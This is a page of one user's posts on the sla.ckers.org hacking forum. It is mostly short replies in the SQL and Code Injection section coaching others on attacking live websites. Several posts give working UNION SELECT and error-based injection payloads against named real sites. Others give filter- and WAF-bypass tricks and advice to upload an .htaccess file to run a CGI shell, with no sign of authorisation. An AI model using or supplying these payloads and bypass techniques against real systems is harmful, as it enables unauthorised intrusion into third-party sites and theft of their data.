Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
This group should mostly be dealing with how web applications enable networking security issues that are otherwise not there. Everything is being tunneled over port 80 now so what does that enable and how do we fix it? 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 50
11 days ago
firestorm
Time based blind.. Maybe. Tell me abt the hosting company or website. I am enlisting bypass methods for different hosting providers and wirewalls. It can be a simple case of multiple firewalls and maybe you got throught mod sec and now you are facing the second firewall. if you find anything interesting mail me : syedsyedafzalin All the best.
Forum: SQL and Code Injection
23 days ago
firestorm
3 cols.
Forum: SQL and Code Injection
5 weeks ago
firestorm
1. its concat not conacat 2. replace + with comma before 4 3. 12 from information instead of 12+information_schema 4. bypass more keywords 5. function group_concat does not exist so you can't use it. 6. Illegal mix of collations for operation 'UNION', use unhex to get pass that. 7. for what on earth you are injecting an Indian domain ?! http://www.ccrc.in/success_stories.php?id=-1+/*
Forum: SQL and Code Injection
7 weeks ago
firestorm
Hi, while searching for injection points I came across a base64-type looking argument to id param. Can anyone help me identify what is it exacctly how to decode/encode it. It ain't base64, It tried decoding it. http://u.laaptu.com/login1.action?id=0mYOgRQ6Hqmry/ianstwtUOz5SJOVqi59VoLNz0uwSE=
Forum: Obfuscation
6 months ago
firestorm
You cannot use insert in sqli like that. What is the query you are injecting to? If its union select, insert wont work with it. MySql does not allow it. If the original query is insert into or it allows multiple query to execute then only you can insert.
Forum: SQL and Code Injection
7 months ago
firestorm
How you came to conclusion that it is mod security ? To me it appears to be cloudflare. In either case, good luck.
Forum: SQL and Code Injection
7 months ago
firestorm
Are you a pentester? if you feel like, share the link with me.
Forum: SQL and Code Injection
8 months ago
firestorm
So, Ajkaro is in great demand these days. ;) Anyways.. Hi, One silly typing mistake you have there. its information not informaion. Correct it you'll get : Duplicate entry 'Ciudades y Departamentos~1' for key 'group_key' and for 1st one (https://www.nivatel.com/static.php?id=9 ).. Its a Bad news. I suspect that there is a restriction of characters. A limit of 20 chars. id cannot tak
Forum: SQL and Code Injection
8 months ago
firestorm
Your welcome!
Forum: SQL and Code Injection
8 months ago
firestorm
Got ya! hehehe... just kidding :P
Forum: SQL and Code Injection
8 months ago
firestorm
Aj! My dear your wrong !! :P
Forum: SQL and Code Injection
8 months ago
firestorm
Why : There is a waf/filter which says Hacking detected! You have been blocked: IP + UA But to notice one important thing, why only your last payload was blocked? What special it had? the keyword 'admin' So how to bypass? Simple, dont use a d m i n . URL Encode it . adminid >> 83 86 88 89 ....so on Simple!
Forum: SQL and Code Injection
9 months ago
firestorm
Nothing... http://www.tonixcomp.net/productDetail.php?Product_ID=-1706+/*!UNION*/+/*!SELECT*/+1,(group_concat(/*!table_name*/)),3,4,5,6,7,8,9,10,11,12,13,14,15,version(),17,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=database()--+-
Forum: SQL and Code Injection
9 months ago
firestorm
try some tool.. there was a fast blind injection tool in some conference.. google it.
Forum: SQL and Code Injection
9 months ago
firestorm
same as the previous one. Good finding though.
Forum: SQL and Code Injection
9 months ago
firestorm
Looking at the unusual structure of the query part, on first impression I would say its a false positive. For HPP you need multiple number of params in query part. You got 'step' and 'back' there, but my instincts tell me that they are not connected into one sql query for the attack to work. I might me wrong. You may read HPP here http://www.andlabs.org/whitepapers/Split_and_Join.pdf Good L
Forum: SQL and Code Injection
10 months ago
firestorm
Indexing is disabled, even acunetix couldnt help. Whats left to say ?? Dont they have sitemap xml anything like that ? Some seo implementations have sitemap in robots.txt from there you may get. Try another crawler, google, bing, search diggity ?
Forum: SQL and Code Injection
10 months ago
firestorm
nice one ajkaro!
Forum: SQL and Code Injection
10 months ago
firestorm
thanks. if there could be more known behaviors of IIS..
Forum: Networking
10 months ago
firestorm
Just as what hack2012 said. Parallels H-Sphere has got an on the folder. Anything not an image is called out 403. Interesting finding . Thank you.
Forum: SQL and Code Injection
10 months ago
firestorm
How to fingerprint IIS? Lets say you cannot trust the server signature sent in response header (they can be masked) so is there any particular behavior or characterstics ? I attempted to fingerprint by making HTTP/1.0 HEAD request without host header heres what I got IIS <7 400 BAD REQUEST looks like a reliable behavior. IIS>=7 404,301,302 .... and what not!!
Forum: Networking
11 months ago
firestorm
In the usr name box : a' and 22=convert(int,@@version)-- You'l get your answer .
Forum: SQL and Code Injection
11 months ago
firestorm
Bad luck. Thats only 7 character window you have there. www.stha.ca/news/index_full.php?id=38++++' => Error Anything beyong 7 is kinda, neglected. http://www.stha.ca/news/index_full.php?id=38+++++++' => null or something.. So what can you buy in 7 char ? www.stha.ca/news/index_full.php?id=38a() => FUNCTION srhb.38a does not exist in..... Just the db name!
Forum: SQL and Code Injection
11 months ago
firestorm
aspx you said! huh easy.. use your brain.
Forum: SQL and Code Injection
11 months ago
firestorm
Things you can try : 1. upload an .htaccess file , from there you can 1. parse jpg or any extension as php . 2. Enable perl or python and upload a cgi shell .. Tell me how it went..
Forum: SQL and Code Injection
1 year ago
firestorm
I noticed that when I make request using gzip encoding the server response has content-length set for me, so I get to know the size without actually having the need to read entire response. Is there any other encoding type for which the server sets content-length in response header ? Thanks!
Forum: Networking
1 year ago
firestorm
Hi, please understand this that the part in comments in query is not even being evaluated. writing /*!50000 something */ means that the part "something" will only be considered if the version is greater than or equal to 5. Since you mentioned that its a version 4, hence "something" is being commented out! so better replace 5 with 4 or 3, that should do. Further, t
Forum: SQL and Code Injection
1 year ago
firestorm
This is no waf dear. The result is exciting! The answer of query is returned as file name! lol!! its bad , my Os cant manage file name larger than 255 characters. Thinking of it, its about 4 times less than what group_concat can return!! lol ... Thanks for share. I think i'll start collecting "strange sqlis" . Regards
Forum: SQL and Code Injection
1 year ago
firestorm
sqlmap is best, for its high customization and openness. If you like gui more than try netsparker.
Forum: SQL and Code Injection
1 year ago
firestorm
Lucky that magic gpc in not on . Its easy, just complete the where part and comment out the rest. http://www.aeaweb.org/articles.php?doi=10.1257/jel.50.1.51')+union all select 1,2,3,4,5,concat(version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+--+- Regards
Forum: SQL and Code Injection
Pages: 12Next
Current Page: 1 of 2